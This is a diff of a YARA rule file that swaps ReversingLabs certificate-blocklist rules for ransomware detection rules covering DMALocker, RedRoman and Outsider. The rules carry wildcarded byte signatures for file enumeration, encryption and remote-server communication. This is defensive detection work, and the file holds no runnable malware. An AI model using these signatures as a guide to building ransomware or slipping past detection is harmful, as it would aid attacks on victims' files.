+            ?? EB ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 8D 95 ?? ?? ?? ?? 52
+            E8 ?? ?? ?? ?? 83 C4 ?? EB ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 6A ?? FF 15 ?? ?? ?? ?? 33 C0 8B E5 5D C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "StarY Media Inc." and pe.signatures [ i ] . serial == "3b:ca:ed:3e:f6:78:f2:f9:bf:38:d0:9e:14:9b:8d:70" and 1599091200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_56D576A062491Ea0A5877Ced418203A1 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Dmalocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects DMALocker ransomware."
 		author = "ReversingLabs"
-		id = "3db67353-6310-54ad-b46a-97daf63fee42"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "3ddef0f1-61c9-59f6-a02c-35768c2cd4d6"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4556-L4572"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.DMALocker.yara#L1-L149"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "19bd6834b432f3dc8786b449241082b359275559a112a8ef4a51efe185b256dc"
+		logic_hash = "107dbc4cacd9d451e9c6fe8aa91cd612f70ac767ee70f74f3a77d1e5548b054f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "DMALocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$dmalock_v1_encrypt_files_1 = {
+            83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ??
+            ?? ?? A3 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83
+            F8 ?? 75 ?? 32 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8A 9D ?? ?? ??
+            ?? 33 C0 84 DB 74 ?? EB ?? 8D [2-5] 8A 90 ?? ?? ?? ?? 84 D2 74 ?? 8A 8C 05
+            ?? ?? ?? ?? 3A CA 74 ?? 80 F1 ?? 3A CA 75 ?? 40 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 8A 8C
+            05 ?? ?? ?? ?? 3A 88 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 33 C0 84 DB 74 ?? 8A 90 ?? ?? ??
+            ?? 84 D2 74 ?? 8A 8C 05 ?? ?? ?? ?? 3A CA
+        }
+		$dmalock_v1_encrypt_files_2 = {
+            EB ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? 52 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
+            ?? 8B 4D ?? 5F 5E 33 CD B0 ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$dmalock_v1_encrypt_files_3 = {
+            74 ?? 80 F1 ?? 3A CA 75 ?? 40 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 8A 8C 05 ?? ?? ?? ?? 3A
+            88 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 56 8D 95 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 52 E8 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 83 C4 ?? A8 ?? 74 ?? A8 ?? 0F 85 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 56 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 55
+            ?? 8B 85 ?? ?? ?? ?? 52 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4
+        }
+		$dmalock_v1_enum_shares_and_discs_type_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ??
+            ?? ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? 83 C4 ?? 89 ?? ?? ?? ?? ?? C6 85 ??
+            ?? ?? ?? ?? 85 ?? 0F 84 ?? ?? ?? ?? ?? 32 DB E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? ??
+            8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 ?? 6A ?? 89 45 ?? 66 89 45 ?? 88 45 ?? 8D 45 ??
+            6A ?? 50 88 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 75 ?? B3 ?? 6A ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 DB 74 ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 32 C0 5F 5E 5B 8B 4D ?? 33 CD
+            E8 ?? ?? ?? ?? 8B E5 5D C3 8D 95 ?? ?? ?? ?? 52 ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 83 BD ?? ?? ?? ?? ?? 77 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 72 ?? C6
+            85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ??
+            8B 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 51 52 68
+        }
+		$dmalock_v1_enum_shares_and_discs_type_2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 8B 5D ?? 56 57
+            8D 8D ?? ?? ?? ?? 51 50 6A ?? 6A ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 33 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 8B 95 ?? ?? ??
+            ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 85 FF 75 ?? 50 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ??
+            ?? 8D A4 24 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 6A ?? 57 E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 57 8D 95 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 39 85 ?? ?? ?? ?? 76 ?? 8D 77 ?? EB ?? 8D A4 24
+            ?? ?? ?? ?? 83 7E ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 51
+            C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0E 8B C1 83 C4 ?? 8D 78 ?? 8B FF 8A 10 40 84
+            D2 75 ?? 2B C7 50 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B 06 83 C4 ?? 8D 50 ?? 90
+            8A 08 40 84 C9 75 ?? 2B C2 6A ?? 8D 84 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 8B 4D ?? 83 C4 ?? 51 8D 95 ?? ?? ?? ?? 53 52 E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83
+            C4 ?? 8B 46 ?? 83 E0 ?? 3C ?? 75 ?? 8B 4D ?? 51 53 8D 56 ?? 52 E8 ?? ?? ?? ?? 85 C0
+            75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 40 83 C6 ?? 89 85 ??
+            ?? ?? ?? 3B 85 ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 50
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 8B 4D ?? F7 D8 5F 1B C0 5E 33 CD 40 5B E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$dmalock_v1_enum_shares_and_discs_type_3 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 6A ?? 51 8B D8 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? ?? ?? ?? BF ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? F7 C3 ?? ?? ?? ?? 76 ?? 57 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B F0 56 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 FE ?? 74 ?? 83 FE ?? 74 ?? 83 FE ?? 75 ?? 8B
+            55 ?? 8B 85 ?? ?? ?? ?? 52 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 47 D1 EB
+            FF 8D ?? ?? ?? ?? 75 ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$dmalock_v2_enum_logical_disks = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 33 DB 68 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 53 50 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F BE 4D ?? 51 8D 95 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 88 9D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ??
+            ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 75 ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ??
+            B0 ?? 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 4D ?? 8A C3 33 CD 5B E8 ?? ??
+            ?? ?? 8B E5 5D C3
+        }
+		$dmalock_v4_remote_server_communication = {
+            85 FF 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 FB ?? 0F
+            87 ?? ?? ?? ?? FF 24 9D ?? ?? ?? ?? 8B 46 ?? 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83
+            C4 ?? B0 ?? C3 8B 4E ?? 8B 56 ?? 51 52 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0
+            ?? C3 8B 46 ?? 8B 4E ?? 50 51 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B
+            56 ?? 8B 46 ?? 52 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B 4E ?? 8B
+            56 ?? 51 52 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B 46 ?? 8B 4E ?? 8B
+            56 ?? 50 51 52 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B 46 ?? 8B 4E ??
+            50 51 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 32 C0 C3
+        }
+		$dmalock_v4_encrypt_file_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ??
+            ?? ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 56
+            32 DB E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 56 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 56
+            6A ?? 89 45 ?? 89 45 ?? 66 89 45 ?? 8D 45 ?? 6A ?? 50 88 5D ?? E8 ?? ?? ?? ?? 6A ??
+            8D 4D ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B3 ?? 6A ?? 57 56 E8
+            ?? ?? ?? ?? 83 C4 ?? 84 DB 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 4D ??
+            33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$dmalock_v4_encrypt_file_2 = {
+            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 B5 ?? ?? ??
+            ?? 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B
+            D8 6A ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? 0F 85 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 B5 ?? ?? ?? ?? 85 F6 74
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 46 ?? 85 C0 74 ?? 8B 75 ?? B9 ?? ?? ??
+            ?? 8B F8 F3 A5 66 A5 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 46
+            ?? EB ?? 33 F6 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 7E ?? 57 89 35 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8B C6 E8 ?? ?? ?? ?? 84 C0 74 ?? 8B 4E ?? 8B 17 56 6A
+            ?? 6A ?? 68 ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 74 ?? C6 46 ?? ?? 8B B5 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 53 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 56 6A ?? 6A ?? 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 56 52 6A ?? 53 E8 ?? ?? ?? ?? 8B 45 ??
+            8B 8D ?? ?? ?? ?? 56 50 6A ?? 51 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 5E 33
+            CD B8 ?? ?? ?? ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Silvo LLC" and pe.signatures [ i ] . serial == "56:d5:76:a0:62:49:1e:a0:a5:87:7c:ed:41:82:03:a1" and 1596249885 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_2 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_1 ) or ( $dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_2 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_2 ) or ( $dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_2 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_3 ) or ( $dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_1 and $dmalock_v2_enum_logical_disks ) or ( $dmalock_v4_encrypt_file_1 and $dmalock_v4_encrypt_file_2 and $dmalock_v4_remote_server_communication and $dmalock_v2_enum_logical_disks )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0Fcba260Df7Da602Ecf4D4D6Fc89D5Dd : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Redroman : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects RedRoman ransomware."
 		author = "ReversingLabs"
-		id = "ce248602-1f28-5707-b921-640271176e7f"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "c860586a-fa50-5bb4-a3b4-13506f9d6030"
+		date = "2021-05-10"
+		modified = "2021-05-10"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4574-L4590"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.RedRoman.yara#L1-L82"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4e9a3e516342820248ebf9b3605b8ce2dbf1d9b4255a5b74f7369dd2f1cdd9d8"
+		logic_hash = "6fb2ac0e7f7ac095766e27c057e5124406dc493c08d01a7e5381403d794c7240"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "RedRoman"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ??
+            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ??
+            ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8D 8C 24 ?? ?? ?? ?? 41 B8 ?? ??
+            ?? ?? BA ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 C7 84
+            24 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 85 C0 75 ?? 33 D2 48 8B 8C 24 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8D 84 24 ?? ??
+            ?? ?? 48 89 44 24 ?? 41 B9 ?? ?? ?? ?? 45 33 C0 BA ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 6B C9 ?? 48 89 84 0C ?? ?? ?? ?? 48 C7 84 24
+            ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 85 C0 75 ?? B8 ?? ?? ?? ?? 48 6B C0 ?? 48 83 BC 04 ??
+            ?? ?? ?? ?? 74 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 84
+            24 ?? ?? ?? ?? EB ?? 33 D2 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 33 D2 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 89 01 48 8B 44 24 ?? 48 8B
+            40 ?? 48 83 38 ?? 75 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? B8 ?? ??
+            ?? ?? 48 6B C0 ?? 48 83 BC 04 ?? ?? ?? ?? ?? 74 ?? B8 ?? ?? ?? ?? 48 6B C0 ?? 48 8B
+            8C 04 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B8
+        }
+		$encrypt_files_p2 = {
+            4C 8D 05 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? ?? 48 89
+            55 ?? 48 89 45 ?? EB ?? 31 C0 41 89 C0 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? ?? 48 89
+            45 ?? EB ?? 48 8B 45 ?? 48 83 F8 ?? 74 ?? 48 8B 55 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? EB ?? EB ?? 48 81 C4 ?? ?? ?? ?? 5D C3 48 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 48 8B
+            85 ?? ?? ?? ?? 48 85 C0 74 ?? EB ?? EB ?? 0F 0B 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ??
+            ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ??
+            ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ??
+            ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ??
+            48 89 85 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ??
+            48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 85
+            C0 74 ?? EB ?? EB ?? 0F 0B 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ??
+            ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ??
+            ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ??
+            ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ??
+            48 8B 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 89 8D
+        }
+		$find_files = {
+            48 8D 9C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 D9 31 D2 E8 ?? ?? ?? ?? 48 8B 0F 48
+            89 DA E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 8D B4 24 ?? ?? ?? ?? 48 8D 9C 24 ??
+            ?? ?? ?? 66 83 BC 24 ?? ?? 00 00 ?? 74 ?? EB ?? 0F 1F 84 00 ?? ?? ?? ?? 48 8B 0F 48
+            89 DA E8 ?? ?? ?? ?? 85 C0 74 ?? 66 83 BC 24 ?? ?? 00 00 ?? 75 ?? 0F B7 84 24 ?? ??
+            ?? ?? 66 85 C0 74 ?? 66 83 F8 ?? 75 ?? 66 83 BC 24 ?? ?? 00 00 ?? 74 ?? 48 8B 47 ??
+            F0 48 83 00 ?? 0F 8E ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 41
+            B8 ?? ?? ?? ?? 4C 89 F1 E8 ?? ?? ?? ?? 48 C7 06 ?? ?? ?? ?? 48 8D 4E ?? 48 8D 94 24
+            ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48
+            C7 06 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 48 C7 06 ?? ?? ?? ?? C6 46 ?? ?? 89 46 ?? 48
+            89 F0 0F 28 B5 ?? ?? ?? ?? 0F 28 BD ?? ?? ?? ?? 44 0F 28 85 ?? ?? ?? ?? 44 0F 28 8D
+            ?? ?? ?? ?? 44 0F 28 95 ?? ?? ?? ?? 44 0F 28 9D ?? ?? ?? ?? 44 0F 28 A5 ?? ?? ?? ??
+            44 0F 28 AD ?? ?? ?? ?? 44 0F 28 B5 ?? ?? ?? ?? 44 0F 28 BD ?? ?? ?? ?? 48 8D A5 ??
+            ?? ?? ?? 5B 5F 5E 41 5E 5D C3 0F 0B
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gold Stroy SP Z O O" and pe.signatures [ i ] . serial == "0f:cb:a2:60:df:7d:a6:02:ec:f4:d4:d6:fc:89:d5:dd" and 1593388801 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4152169F22454Ed604D03555B7Afb175 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Outsider : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Outsider ransomware."
 		author = "ReversingLabs"
-		id = "e8975a1a-ac7c-5016-a206-de9ca7eea37f"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "44edccb1-9e2a-5ff9-b4b5-72ceec2f7947"
+		date = "2020-10-23"
+		modified = "2020-10-23"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4592-L4608"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Outsider.yara#L1-L88"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fbb2124b934c270739f564317526d5b23b996364372426485d7c994a83293866"
